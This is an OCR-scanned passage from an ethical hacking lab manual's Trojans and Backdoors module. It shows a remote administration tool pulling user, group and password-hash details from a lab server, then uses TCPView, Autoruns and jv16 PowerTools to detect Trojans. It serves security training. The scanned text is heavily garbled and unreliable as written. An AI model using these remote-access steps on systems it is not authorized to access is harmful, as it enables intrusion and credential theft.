10.0.0 .1 3 : AW R C PRO 9.3.9 file Iools Help Syslnfo NetworicJnfb I Fie System I Use's and Groups Chat

Desktop

co n te n ts o f CIJ Cl C3 C□ D □ Cl
D

'c:'_______

SRecycle Bin Boot Documents and Settings PerfLogs Program Files (x86) Program Files ProgramData
System Volume Inform...

□ □

Users Windows File System: Serial Number: NTFS 6C27-CD39 Type Labei: Fixed Capacity: Free space: 17,177,767.936 bytes 6.505.771.008 bytes

Progress Report
| administrator

Password
^ cf Connect ] Request ajthoriratxx‫־‬ Disconnect
@ Oear on is c o m e c t

#16.28.24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

kBytesIn: 251.64

ConnectonCXjraton: 6 Minutes, 18 Seconds.

FIGURE 6.8: Information of the remote computer

13. Select U sers and Groups, which will display the complete user details.
10.0.0.13 :A W R C PRO 9.3.9 File Jools Help
Syslnfo ^ Groups \ NetworkJnfo Ffe System Use's anc Groups I Chat

'‫ ־‬: ‫" ם‬

Desktop

j

Users

Password H a^ies

User Information for Administrator User Account. Administrator Password Age 7 days 21 hours 21 minutes 33 seconds Privilege Level: Administrator Comment Built-in account for administering the computer/domain Flags: Logon script executed. Normal Account.
Full Name:

Workstations can log from: no restrictions Last Logon: 9/20/2012 3:58:24 AM Last Logoff: Unknown Account expires Never expires User ID (RID) 500 Pnmary Global Group (RID): 513 SID S 1 5 21 1858180243 3007315151 1600596200 500 Domain WIN-EGBHISG14L0 No SubAuthorties 5

Remote Host
1 0.0.0.13

User Name

Progress Report

[ administrator
^ Disconnect

W Connect nf D Request ajthon:at>or

Password

#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

@ Oear on is c o m e c t C um euiim i3u1atu< 1: e Minutes, 2 6 Seconds.

kByle* 111: 256.00

FIGURE 6.9: Information of the remote computer

C E H L ab M an u al P age 466

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

rs
file Iools Help Syslnfo NetwortJnfo We System Desktop

10.0.0.13: AWRC PRO9.3.9

Use's and Groups

Chat

\ | Groups ~ | y Passwoid Ha«hes

Groups:

Names Administrators Backup Operator Certificate Service DC Cryptographic Oserat Distributed COM Use‫־׳‬ s Event Log Readers Guests <1

SID S-1-5-32-544 (Typo S-1-5-32-551 (Type S-1-6-32-674 (Type S-1-5-32-569 (Type S-1-5-32-562 (Type 5-1-5-32-573 (Type S-1-5-32-546 (Type
III

Alias/Do Alias/Do Alias/Do . Alias/Do Alias/Do . Alias/Do... Alias/Do

Comment Administrators have complete and unrestricted Backup Operators can override security restrict Members of this group are allowed to connect t« Members are authorized to perform cryptograph Members are allowed to launch. actKate and us Members of this group can read event logs from Guests have the same access as members oft _____I

Global
G ro u p s :

S -1-5-21-1858180243-3007315... Ordinary users

Progress Report | administrator ^
c f

Connect
] Request a jth on rab or

Disconnect
@ d e a r on is c o m e c t

Password

#16.28.24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13

kBytesIn: 257.54

Connection Ouraton: ?Minutes, 34Seconds.

FIGURE 6.10: Information of the remote computer

FIGURE 6.11: Information of the remote computer

14. Tins tool will display all the details o f the remote system. 15. Analyze the results o f the remote computer.

Lab Analysis
Analyze and document tlie results related to die lab exercise. Give your opinion on your target’s security posture and exposure dirough public and tree information.

C E H L ab M an u al P age 467

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

T o o l/U tility

In fo rm atio n C o llected /O b jectiv es A chieved Remotely accessing Windows Server 2008 R esult: System inform ation o f remote Windows Server 2008

Atelier Web Remote Commander

Network Information Path remote Windows Server 2008 viewing complete tiles of c:\ o f remote Windows Server 2008 User and Groups details o f remote Windows Server 2008 Password hashes

Questions
1. Evaluate die ports that A\\”RC uses to perform operations. 2. Determine whether it is possible to launch AWRC from the command line and make a connection. If ves, dien illustrate how it can be done. In tern e t C o n n ectio n R eq u ired □ Yes P latform S upported 0 C lassroom 0 No

C E H L ab M an u al P age 468

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Detecting Trojans
A Trojan is aprogram that contains malicious or harmful code inside apparently harmlessprogramming or data in such a > raj that canget control and cause damage, such as mining thefile allocation table on a hard drive.
ICON f~'/ Valuable KEY

Lab Scenario
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One m ust realize that the World Wide W eb is one o f the tools that transmits information as well as malicious and harmful viruses. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function o f tins type o f virus is to create a backdoor 111 order to access a specific system. With a backdoor Trojan attack, a concerned user is unaware about the possible effects until sensitive and im portant information is found missing from a system. With a backdoor Trojan attack, a hacker can also perform other types ot malicious attacks as well. The other name for backdoor Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://w w w .com bofix.org). You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuable data from the network, and identity theft.

information .‫■׳י‬ '* Test your ____ knowledge______ Web exercise ^ m Workbook review

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks. The objectives o f the lab mclude:
& Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

• • • • •

Analyze Analyze Analyze

using Port Monitor using Process M onitor using Registry Monitor

Analyze using Startup Program Monitor Create MD5 hash tiles for Windows directory files

C E H L ab M an u al P age 469

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Lab Environment
To carry out this, you need:
■ ■ ■ ■ ‫י‬ Tcpview, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and B ackdoors\Process Monitoring Tools\Autoruns PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and B ackdoors\Process Monitor Tool\Prc View Jv16 power tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012 FsumFrontEnd. located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend


& Disabling and Deleting Entries If you don't want an entry to active die nest time you boot or login you can either disable or delete it. To disable an entry uncheck it. Autoruns will store die startup information in a backup location so diat it can reactivate die entry when you recheck it. For items stored in startup folders Autoruns creates a subfolder named Aiitoruns disabled. Check a disabled item to re-enable it

A computer running Window Server 2008 (host)
Windows Server 2003 running 111 Yutual Machine

■ If you decide to download the la te st version, then screenshots shown 111 the lab might differ ■ ■ You need a web browser to access Internet Administrative privileges to run tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program diat contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die lile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may differ from what it is 111 the lab, but the actual process of connecting to the server and accessing the processes is same as shown 111 tins lab.

m.

TASK

1

Lab Tasks
1. Go to Windows Server 2012 Virtual Machine. 2. Install Tcpview from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView. 3. The TCPYiew main window appears, with details such as Process, Process ID, Protocol, Local address. Local Port, Remote Address, and Remote Port.

Tcpview

C E H L ab M an u al P age 470

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

TCPView - Sysinternals: www.sysinternals.com

File Options Process View Help
H
a h

|
PID 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572 1572
III

03 Should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu. Only die currendy selected item will be deleted.

|| Process > C l dns.exe T7 dns.exe T7 dns.exe T 7 dns.exe i - dns.exe I"7 dns.exe i7 ‫ ־‬dns.exe i" 7 dns.exe IF dns.exe » dns.exe 1‫ י‬dns.exe » 1 dns.exe T7 dns.exe r dns.exe » dns.exe T dns.exe ‫ י‬dns.exe r dns.exe ‫ י‬dns.exe ‫ ׳ י‬dns.exe 1‫ ־‬dns.exe 1 dns.exe T dns.exe • ‫ ו‬dns.exe • dns.exe

Protocol TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP

Local Address win-2n9stosgien WIN-2N9ST0SGL WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9STOSGI.. WIN-2N9STOSGL

Local Pott domain domain 49157 domain domain 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49162 49163 49164 49165 49166 49167 49168 49169 49170 49171

w fl
V‫׳‬/l Wl

V

1

< r

>

_____________ ______________ ______________ ______________ _________________

U

FIGURE 8.1: Tcpview Main window

tool perform port monitoring.
1 File Options TCPView - Sysinternals: www.sysinternals.com I ~ I □ f

X

Process View Help
PID 385G 892 960 1552 2184 3440 4312 4272 1808 1552 1552 9G0 1552 3092 960 960 1064 960
4

y

a

‫@ !־‬
Protocol TCP TCP TCP TCP TCP TCP TCP TCP TCP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP TCP TCP Local Address WIN-2N9ST0SGI.. WIN-2N9STOSGI.. WIN-2N9STOSGL WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9STOSGI.. WIN-2N9ST0SGI.. WIN-2N9STOSGL WIN-2N9ST0SGI.. win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGI... win-2n9stosgien WIN-2N9STOSGL WIN-2N9ST0SGL WIN-2N9ST0SGI... WIN-2N9STOSGI.. win-2n9stosgien win-2n9stosgien win-2n9stosgien win-2n9stosgien WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI... WIN-2N9STOSGI... |Local Port 5504 49153 49154 49159 49161 49163 49168 49169 49187 bootps bootpc isakmp 2535 3391 teredo ipsec-msft llmnr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-ds 5985

G3 If you are running Autoruns without administrative privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access

Process ' E l svchostexe (O svchostexe E l svchost.exe E l svchost.exe E l svchost.exe E svchost.exe E svchost.exe E svchost.exe E svchost.exe 1 '‫ י‬svchost.exe E svchost.exe 1 ' ‫ י‬svchost.exe E svchost.exe [□ svchost.exe E svchost.exe E svchost.exe E svchostexe E svchost.exe T7 System 1 ‫ י‬System • 1 System • ' System 7‫ יי‬System T7 System • 1 System

1R ^
Wl Wl Wl Wl Wl Wl Wl Wl Wl

* *

4 4
4
4 4 4
III

Wl wir wit Wl Wl Wl Wl v >

n
FIGURE 8.2: Tcpview Main window

5. Now it is analyzing die SMTP and odier ports.

C E H L ab M an u al P age 471

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

TCPView - Sysinternals: www.sysinternals.com
File Options Process View Help

‫ד‬
Stat LIST LIST LIST LIST LIST LIST LIST LIST LIST LIST

y a
& Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch initially launch Autoruns with administrative rights
“rotocol CP CP CP CP CP CP CP CP CP CP DP DP DP DP DP DP DP DP DP C P CP C P CP C P C P < Local Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien WIN-2N9ST0SGL win-2n9stosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9STOSGL WIN-2N9ST0SGL win-2n9stosgien win-2n9stosgien win-2n9slosgien wirv2n9$tosgien WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL Local Port 3388 5504 49153 49154 49159 49161 49183 49168 49169 49187 bootps bootpc isakmp 2535 3391 teredo ipsecmsft llm nr 53441 netbios-ssn microsoft-ds microsoft-ds http https microsoft-ds
III

Remote Address WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGL WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI.. WIN-2N9ST0SGI..

x

Remote Pott 0 0 0 0 0 0 0 0 0 0 *
‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬ ‫יי‬

* * *
‫יי‬

*
‫יי‬ ‫יי‬

Cl There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit chose Jump To in the Entry menu or double-click on the entry or location's line in the display

WIN-2N9ST0SGL 0 win-egbhisgl 410 49158 windows8 49481 WIN-2N9ST0SGI.. 0 WIN-2N9ST0SGI.. 0 WIN-2N9ST0SGI.. 0
. ‫ך‬

LIST EST, EST, LIST LIST LIST ‫ח־‬

FIGURE 8.3: Tcpview analyzing ports

You can also kill die process by double-clickuig diat respective process, and dien clicking die End Process button.
Properties fo r dns.exe: 1572
| ‫ך־‬ Domain Name System (DNS) Server Microsoft Corporation Version: Path: C:\Windows\System32\dns.exe G.02.8400.0000

End Process OK

FIGURE 8.4: Killing Processes

1m TASK 2
Autoruns

Go to Windows Server 2012 Virtual Machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns. It lists all processes. DLLs, and services.

C E H L ab M an u al P age 472

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

O

Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter.J ~
Entry O ptions User Help

File

HijacksImage3

|ExecuteBoot3

|Codecs t j j LSA Providers | Internet Explorer | J

|

,‫־‬ $ ► Applnit

|

,‫־‬ V KnownDLLs

|

A

Wriogon

1ft Winsock Provtders ]

&

Print Monitors | < Explorer |

£ ‫ ־‬Network Providers | 9 . Scheduled Tasks |

Sidebar Gadgets Drivers

O

Everything

Logon

&

Services |

Autorun Entry Description Publisher ■}jf HKLM\SOFTWARE\Microsoft\Window$ N T\CurrentVers10n\Winl0g0nl'AppS etup

Image Path c:\windows\system32\usrlo...

O You can view Explorer's file properties dialog for an entry's image file by choosing Properties in die Entry menu. You can also have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

0 0 0 0

g ] UsrLogon cmd HKLM \S 0 FTWAR E\M croscrft\Wndows\CurrentVers10n\R un [■13HotKeysCmds £ 3 IgfxT ray [■1‫־‬ hkcmd Module igfxTray Module persistence Module Intel Corporation Intel Corporation Intel Corporation

c: \windows\system32\hkc... c:\windows\system32\igfxtr... c:\windows\system32\igfxp...

Persistence

$
E 0

H KLM\S 0 FTWAR E\W0w6432N ode\M icrosott\Wmdows\CurrentVersion\R un Adobe ARM [■1 Adobe Reader Adobe Reader and Acrobat. .. Adobe Systems Incorporated c:\program files (x86)Vcomm... Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:\program files (x86)\adob

0 EPS0N_UD_S.. EPSON USB Display V I r‫־‬a r ‫\־‬ . . ■ ^ . T ■

40

SEIKO EPSON CORPORA.. c:\program files (x86)\epso... ^ . . ™ .

Ready

Windows Entries Hidden.

FIGURE 8.5: Automns Main Window & Simply run Autoruns and it shows you die currendy configured autostart applications in the locations that most direcdy execute applications. Perform a new scan that reflects changes to options by refreshing die display CQ Internet Explorer This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions 1 °-

following is the detailed list on die Logon tab.
O

Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
Entry O ptions User Help

I File

d is ) ^ 1 X ^
H Codecs | P Boot Execute | ^ Image Hjacks | [ j ) Applnit £ | KnownDLLs | ^ Winlogon fc* Winsock Providers Print Monitors ^ Explorer Description HotKeysCmds hkcmd Module
igfxT ray Module

LSA Providers

Network Providers |

Sidebar Gadgets Services ^ Drivers

!3
0 0 0 S 0

Everything |

Logon

4$

Internet Explorer Publisher

'1 Scheduled Tasks |

Autorun Entry [ij] lil E3 0 lafxTrav

Image Path c:\windom\system32\hkc... c:\windows\system32\igfxtr c:\windows\system32\igfxp . c:\program files (x86)\comm.. c:\prog1am files (x86)\adob..

Intel Corporation Intel Corporation Intel Corporation

Persistence Adobe ARM

persistence Module

Adobe Reader and Acrobat. .

Adobe Systems Incorporated

Adobe Reader... googletalk Google Tak

Adobe Acrobat SpeedLaun... Google

Adobe Systems Incorporated

0
0

EPS0N_UD_S. EPSON USB Display V I. 40

SEIKO EPSON CORPORA... c:\program files (x86)\epso. c:\program files (x86)Vgoogl. Sun Microsystems, Inc. c:\program files |x86)Vcomm

0

9 fH

SurvlavaUpdat JavalTM) Update Scheduler

t S C:\ProgramDala\Microsoft\Windows\Start Menu\Progcams\Startup

Ready

Windows Entries Hidden

FIGURE 8.9: Autonuis Logon list

11. The following are die Explorer list details.

C E H L ab M an u al P age 473

E th ica l H a c k in g an d C ounterm easures Copyiight © by EC-Council All Rights Reserved. Reproduction is Stricdy Proliibited.

M od ule 0 6 - T rojans and Backdoors

O

Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L
Entry O ptions User Help

File

| Codecs

|

3

Boot Execute

|

3

Image H^acks |

|

'■ > Applnit

|

'

KnownDLLs

]

A

Wnbgon

& Services All Windows services configured to start automatically when the system boots.

Winsock Providers | Z? Everything | ^

1 * Print Monitors
,j Explorer

LSA Providers | Internet Explorer | J Publisher

Network Providers | Scheduled Tasks |

Sidebar Gadgets Services | Drivers

Logon[

£

Autorun Entry Desciiption HKLM \S 0 FTWAR E\Classes\Protocois\F*er 0 0 0 0 0 0 ^ te x t/x m l ^ fo‫־‬

Image Path c:\pr0gramfiles\c0fnm0n fi..

Microsoft Office XML MIME... Microsoft Corporation

•iff HKLM \S oftware\Classes\x\S heC xVContextM enuH andlers
SnagltMainSh.. Snagit Shell Extension DLL WinRAR WinRAR shel extension Snagit Shell Extension DLL TechSmith Corporation c:\program files (x86)\techs.. c:\programfiles\winrar\rare. c:\program files (x86)\techs.. c:\programfiles\winrar\rare. c:\program files (x8S)\techs. Alexander Roshal TechSmith Corporation H KLM \S 0ftware\W0w6432N ode\Classes\x\S helE x\ContextM enuH andlers SnagltMainSh . *V WinRAR32 WinRAR shel extension Alexander Roshal TechSmith Corporation

H KLM \S oftware\Classes\D irectory\S helE xSContextM enuH andlers SnagltMainSh Snagit Shell Extension DLL

Ready

Windows Entries Hidden.

FIGURE 8.10: Autonins Explorer list

12. The following are die Services list details.
O

Autoruns [WIN-2N9STOSGIEN\Administrator] - Sysinternals: www.sysinter...L
Entry O ptions User Help

File

*J & & B X *
H Codecs | ‫־־‬I Boot Execute ] 3 Image hijacks | [ j l Applnit £ | KnownDLLs | ^ Wintogon

(33 Drivers This displays all kernel-mode drivers registered on the system except those that are disabled

fc?; Winsock Providers | O Everything | ^

&

Print Monitors Explow T i

LSA Providers Internet Explorer Publisher

Network Providers 1

Sidebar Gadoets Services Drivers

Logon |

Scheduled Tasks |

Autorun Entry g 0 0 0 0 0 0 0 [ 1 ‫ י‬AdobeFlashPta [■1 c2wts 0 EMPJJDSA

Description

Image Path

HKLM\System\CurrentControlSet\Services This service keeps you Ad... Adobe Systems Incorporated c: \windows\syswow64\ma Service to convert claims b .. Microsoft Corporation EPSON USB Display V I 40 c:\program filesNwindows id.. c:\program files (x86J\m02i ... c:\program files (x86)\comm c:\program files\common fi c:\program filesVupdate ser SEIKO EPSON CORPORA.. c:\program files (x86)\epso...

F I M02illaMainten... The Mozia Maintenance S. . Mozila Foundation 0ose F I osoosvc H Savesinstalationfilesused .. Microsoft Corporation Office Software Protection... Microsoft Corporation

WSusCertServer This service manages the c... Microsoft Corporation

Ready

Windows Entries Hidden

FIGURE 8.11: Autoruns Services list

13. The following are die Drivers list details.

C E H L ab M a n u al P age 474

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

O

Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L
Entry O ptions User Help

File

3

Image H^acks

|ExecuteBoot! 3 |CodecsH

[ | £‫ ־‬Network Providers | Scheduled Tasks | Sidebar Gadgets Services Dnvers

,‫־‬$ Applnit

|

,‫־‬ V KnownDLLs

|

A

ft Winsock Providers [

&

Print Monroes |

$

LSA Providers*

O

Everything |

Logon | . < Explorer | ^ Description

Internet Explorer | J Publisher

£9 Scheduled Tasks Task scheduler tasks configured to start at boot or logon

Autorun Entry ^ 3ware

Image Path c: \windows\system32\drrve. c: \windows\system32\dr1ve. c: \ windows\system32\drive. c: \ window$\system32\dnve. c: \ windows\system32\dnve. c: \ windows\system32\drive. c: \ window$\system32\drive. c: \ windowsSsystem32\drrve. c: \window$\system32\drrve.

HKLM\System\CurrentControlSet\Services | LSI 3ware SCSI Storpoct Driver}SI Adaptec Windows SAS/SA... Adaptecjnc. Adaptec Windows SATA St.. Adaptec, Inc. Adaptec StorPort Ultra320... Adaptecjnc. AHD 1.2 Device Driver Storage Filter Driver Advanced Micro Devices AdvancedMicroD evices AM D Technology AH Cl Co... AM D Technologies Inc. Adaptec RAID Storpoct Driver PMC-Sierra, Inc. arcsas & Adaptec SAS RAID W S 0 3 ... PMC-SierraJnc. S) adp94xx( adpahci ^ adpu320 ,‫־‬ amdsata 4 amdsbs ^ amdxata ^

Ready

Windows Entries Hidden.

FIGURE 8.12: Autoruns Drivers list.

14. Tlie following is die KnownDLLs list 111 Antonins.
O

Autoruns [WIN-2N9STOSGIEN\Administrator] ‫ ־‬Sysinternals: www.sysinter...L
Entry O ptions User Help

File

d j) & B X *
I?• Winsock Providers | O ‫כ‬ Q Everythin Ever/hing Codecs ^ Q ^ Print Monitors | ^ Explorer ] | LSA Providers | f Network Providers | 9 • Scheduled Tasks 1 Sidebar Gadgets Drivers Winlogon Logon |

&

Internet Explorer ] J |

Services [

Boot Execute

f"^ Image Hijacks

[ j | Applnit

\

KnownDLLs Image Path

j

Autorun Entry

Description _W0w64

Publisher

ijT HKLM \System\CurrentControlSet\Controf\S ession Manager\KnownDlls

0
0 1‫ר‬ 0 ■‫י‬

13

File not found: C:\Wndows... File not found: C:\Wndows. File not found: C:\Wndows...

W ow64cpu Wow64win

Ready

Windows Entries Hidden

FIGURE 8.13: Autoruas Known DLL’s list.

15. Install and launch jv16 PowerTools 111 Windows Server 2012 (host machine).
T A S K 4

16. jvl6 Power Tool is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
Jv16 Power Tool

17. To launch jv16 PowerTools, select die Start menu by hovering die mouse cursor on die lower-left corner ot die desktop.

C E H L ab M a n u al P age 475

E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

u

‫י ״‬

Unilb Rnta

€ (tarn
aP
PhutT..‫״‬

■3 Windows Server 2012
Wirdowt Server 2012 Rocate Cancxfatr Caucrnt. fcvaluator copy. Eud *40.

.. . * J L J L . ‫ל‬

1

FIGURE 7.1: Windows Server 2012 Start-Desktop

18. Click jv16 PowerTools 2012 111 Start menu apps.
Start
A dm inistrator A

03 Winlogon Notifications Shows DLLs that register for Winlogon notification of logon events

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my computer icon.

C] Winsock Providers Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools diat can remove them. Autoruns can uninstall them, but cannot disable them

C E H L ab M a n u al P age 476

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

P 1 E*e
O

jvl 6 PowerTools 2012
Language lo o k Help

K

r

Trad LrnMDon n Effect - 60 days left

Live Support: Onlne

Handbook not avadaWe

Home

Registry Tools

‫ד‬ ^ ‫ו‬ i

File Tools

Fully remove software and leftovers

Speed up my computer

System Tools

Privacy Tools

Backups

Control which programs start automabcaly

Immunize my computer

Verify my downloads are safe to a n

Acton Hstory

L U J Settings
Trial Reminder

92<*>

Registry Health 9SV0 PC Health jv l6 PowerTools (2.1.0.1173) runnng on Datacenter Edition (x64) with 7.9 GB o f RAM [10:29:45 ‫ ־‬Tip]: Your system has now been analyzed. The health score of your computer ts 95 out o f 100 and the health score o f yoir Wndows regstry 6 92 out o f 100. I f you scored under 100 you can improve! the ratings by usrtg the Oean and Fa My Computer tool.

FIGURE 8.20: jvl6 Home page.

20. Tlie Clean and fix my computer dialog box appears. Click the Settings tab and then click die Start button.
jv l 6 PowerTools 2012 [W8-x64] - Clean and fix my computer *


A

Settings

Additional safety

Additional options

#

Search words

Li 10

Ignore words

S e ttin g s
Emphasize sa fe ty over both scan speed and the number o f found errors.

Emphasize the number o f found errors and speed over sa fe ty and accuracy.

Selected setting:

Normal system scan policy: all W indows-related data is skipped for additional safety. Only old temp files are listed.

H

Cancel

C E H L ab M an u al P age 477

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

(3S LSA Providers Shows registers Local Security Authority (LSA) authentication, notification and security packages

M od ule 0 6 - T rojans and Backdoors

FIGURE 8.21: jvl6 Clean and fix my computer dialogue.

21. It will analyze your system for tiles; this will take a few minutes.
1 -1 jv16 PowerTools 2012 [W8-x64]
File Select Tools Help -

Clean and fix my computer!

‫־‬

I‫ם‬P x

[
‫יג‬ Analyzing your computer. This can take a few mmutes. Please wait...

‫ ט‬Printer Monitor Drivers Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself

Abort

FIGURE 8.22: jvl6 Clean and fix my computer Analyzing.

22. Computer items will be listed after die complete analysis.
iv16 PowerTools 2012 rW8-x641
-

Clean and fix mv comDuter!

‫־‬

!‫ ם‬r

x

LJ You can save die results of a scan with File->Save and load a saved scan widi File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options

File Item

Select

Tools

Help

Severity Description Tags Item / Seventy Descrpbon Tags

.....................
7 7 266 4 146 116 23

!3 R e g istry E rrors !‫ ־‬I ^ In v a lid file or d ire c to ry re fe re n c e

I ] c ) R e g istry ju n k ‫ח‬ |~1 ‫ח‬ ^ ♦J O b so le te so ftw a re e ntry U se le ss e m pty k e y ♦J U se le ss file e xte n sio n

+J S ta rt m enu and d e s k to p items

I
Selected: 0, h igh lig h ted : 0, to ta l: 296

-

II

Delete

dose

FIGURE 8.24: jvl6 Clean and fix my computer Items details.

23. Selected item details are as follows.

LJ Sidebar Displays Windows sidebar gadgets

C E H L ab M an u al P age 478

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer
File Item Seventy Description Tags Item / Seventy Descry to n Tags
A

Select

Tools

Help

13 R e g istry E rrors 13 ‫ח‬ ‫כ‬ In v a lid tile or d ire c to ry re fe re n c e :3 % FJe or directory X : Fie or directory 'C: 13% Fie or directory X : FJe or directory X : 13% 13% File or directory X : Fie or directory X : FJe or directory X :

7 7 =

HKCRUnstall 1HKCRUnstal

^

HKLM\softw<

_ ] H K L M \s o ttw ;^ B □ HKLM\SOFT\/ □ HKLM\SOFT\l

H Compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to die saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items

_ | HKLM\S0ttwi □ 13 R e g istry ju n k

266

V

Selected: 0, h ig h lig h te d : 0, to ta l: 296

FIGURE 8.23: jvl6 Clean and fix my compute! Items.

24. The Registry junk section provides details for selected items.
1 -‫ י‬jv16 PowerTools 2012 [W8‫־‬x64]~ Clean and fix my computer! ‫־־‬
File Select Tools Help

‫ם‬

*

[‫־־‬J If you are running Autoruns without administrative privileges on Windows Vista and attempt to change die state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights

Item Severity Description Tags Item _] 3 3 □ □ □ □ □ □ □ □ ‫ח‬ / Severity Description Tags 266 4 Obsolete software e Obsolete software { Obsolete software ‫ז‬ Obsolete software e 146 Useless empty key Useless empty key Useless empty key Useless emotv kev ‫✓י‬

